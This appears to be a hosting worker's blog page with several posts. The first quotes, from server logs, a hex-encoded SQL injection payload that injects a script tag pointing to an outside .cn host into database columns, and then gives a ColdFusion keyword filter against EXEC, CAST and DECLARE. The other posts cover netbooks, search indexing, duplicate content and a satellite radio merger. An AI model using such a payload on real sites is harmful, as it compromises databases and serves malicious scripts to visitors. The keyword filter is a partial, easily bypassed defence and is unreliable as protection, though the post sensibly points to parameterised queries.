Daisy’s Blog

A while back, there was an internet worm, or an extremely prodigious hacker, hacking sites through sql injection to place links to a chinese spam site. It was really frustrating, because it targetting cold fusion sites and we host a lot of those.

Here’s an example of how these attacks looked in the logfiles:

;DECLARE
%20@S%20CHAR(4000);SET%20@S=CAST(0×4445434C415245204054207661726368617228323535
292C4043207661263686172283430303029204445434C415245205461626C655F437572736F7220
435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2073797
36F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420
616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747
970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50
454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4
37572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30
2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432
B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D2D2727207
76865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637269
7074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7323E3C2F7363726970
743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F722
0494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C
4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

Well, we ended up finding two lines to place into our Application.cfm files to stop it. Basically, it looks at the query string and aborts if it finds an EXEC or CAST in it. Simple and effective:

<cfif cgi.SCRIPT_NAME contains “EXEC(” OR cgi.PATH_INFO contains “EXEC(” OR cgi.QUERY_STRING contains “EXEC(”><cfabort></cfif>

I paste that line in a few times and change “EXEC(” to “CAST(” and “DECLARE(”, and to anything else that happens to be something I’m not going to use and might be dangerous.

The real solution, of course, is to write good code. Use cfqueryparam with maxlength set. Best practices are something I can use when I code, but as we host code that our users write or download, its impossible for me to make sure all of their code is secure. I can, however, write a few lines into the top of their application.cfm’s to protect our sql servers.

Programming, Technology code, coldfusion, sql injection

If you’re looking for a nice cheap netbook this holiday season, check out the Acer Aspire One that’s on Staples black friday advert.

The Aspire One is an ultraportable that’s just a little bit bigger than my Asus EeePC (with a 7″ display). Its got a strong processor for a netbook, and good memory, and a REAL HARDDISK. A bonus for those who were thinking the EeePC’s built in SSD drives were just a bit too small.

They also come in the customizable colors that made the EeePC so popular. (Yes ladies, you can get yours in pink!)

Gadgetry, Technology

Being a new and overwhelmed blog-writer, I’ve been struggling with what seemed like a long delay in getting my spiffy new blog indexed by everyones favorite search engine, Google. I read some on googles pages for webmasters, and the general consensus there seemed to be that waiting was in order. There wasn’t alot of detailed information about how long, wether I was looking at hours, weeks, or even months worth of looking for that first google spider coming to my blog.

Then a websearch brought me to the answer, and I’d like to share it: It might never happen unless I do more than I was expecting to. I added my url and waited, and waited. Aparently though, this only starts one part of a process, that without links from other websites (and not just any old link will do), it may never happen.

I found the answer here, at Smart IT Consulting: Google Sitemaps - The How-To What-Is FAQ

I’d recommend a thorough reading of thier FAQ’s for anyone that’s in my position, wanting to get a site listed on google, or to increase the rankings of a site already there. I sure can’t wait until I’m at that point. Hopefully now that I’m back on the right track, and I know what I can do to make this work, I’ll be there soon.

Blogging, Technology google, webmasters

Working at a web hosting company, I frequently get asked questions about search engine optimization. I’m definately no expert in that arena, infact I’ve offered only the simplest of advice and never gone into detail for a customer that was looking for SEO. What I usually say is to make sure the content is original, and doesn’t look like spam, then use a handful of relevant keywords and a title that describes the page instead of advertising for it.

That has worked surprisingly well for me and for a few of the customers I advised to try it, but its vague. It doesn’t satisfy the people that really need to get into the nuts and bolts of how what they write affects where they appear on the search results pages. I need to get myself more information so that I can be more informative when people ask. Perhaps a bit more informative, but I still feel I’m dabbling in an art that’s more magic than science.

One of the things I’ve been asked, specifically, is about the so-called ‘duplicate content penalty’ from google. As in, multiple pages on your domain that display the same results being penalized. I went in search of, and found quickly and answer for this. It does not happen.

According to Susan Moskwa of Google in a Blog Entry:

Let’s put this to bed once and for all, folks: There’s no such thing as a “duplicate content penalty.” At least, not in the way most people mean when they say that.

So, all of those cgi applications, e-commerce programs, and on and on, ARE OK. When they see different urls, for example HTTP GET strings with long series of parameters that can appear in different orders, they combine the results of the duplicate pages, and assign the search engines ‘value’ to the combined page, represented by one of the URL’s. So /store/catalog.asp?cat=turban&color=black and /store/catalog.asp?color=black&cat=turban return the same results, and get grouped together and represented by one of the urls, which gets chosen nondeterministically by the crawler.

Its not penalized! But then again, you can’t choose the url that represents your content that way either. Not so good. What do you do if you want or need to do that? The answer is to use a Sitemap (note the capital ‘S’).

So, if that’s not the duplicate content that does get penalized, what is?

Spam sites, and theft, basically. Sites that scrape content from another site without adding meaningful original content, or sites that don’t differ from one another in any significant way. My next door neighbor in one of the houses I used to live in loved to do Multi Level Marketing schemes on the web, and frequently got new ‘cookie-cutter’ web sites from the companies he signed up with, and tried to advertise them (spamvertise, actually, but that’s another story). This is why that never worked. It was just like the other 99 sites above and below him, and the web just doesn’t need another copy of that page.

So for all intents and purposes, unless you’re scraping and republishing content that’s not original, you shouldn’t have to worry about the duplicate content penalty.

Blogging, Technology google, SEO

This week the two previously competing satellite radio companies Sirius and XM, whose companies merged four months ago, also merged their channels together into Sirius XM — a move that feels more like a Sirius takeover than a merger.  Complaints are ringing out across the net from XM customers about the few remaining stations before the merger being replaced with stations from Sirius.

For the past months, I have seen XM’s lineup dropping stations. There had been a series of 10 stations that played hip-hop, for example, from 60-70 on the ‘dial’. That was when I signed up about two years ago. Then one day a few stations just disappeared. The buttons skipped thier numbers, their names were gone from the XM listings. As if they’d never existed. So then there were only 8, and your forward and back skipped a few numbers on the way from 60 to 70. And then 4 or 5. Then two. Two stations between 60 and 70! Well, they kept the best ones, I guessed, and I enjoyed the two that seemed to stay around. I started to wonder if I should keep my subscription when it came up for renewal. This wasn’t only happening to hip-hop, it was in all the genres of music. Electronic, Rock, Alternative. The selections dwindled to almost non-existant.

Then the merger came, and it happened across the board. Many more stations went off air, and many more, with little warning, were replaced with the stations from Sirius. The three remaining Rock stations that I was listening to, Fred, Lucy, and Ethel, have been replaced with Sirius counterparts which, pardon me saying, are not nearly what I’m used to. Their selections just don’t compare.  The Sirius DJ’s are constantly breaking in and talking, doing station ID’s, answering calls. XM as I remember it was music, uninterrupted, commercial free, good music.

It isn’t anymore.

Technology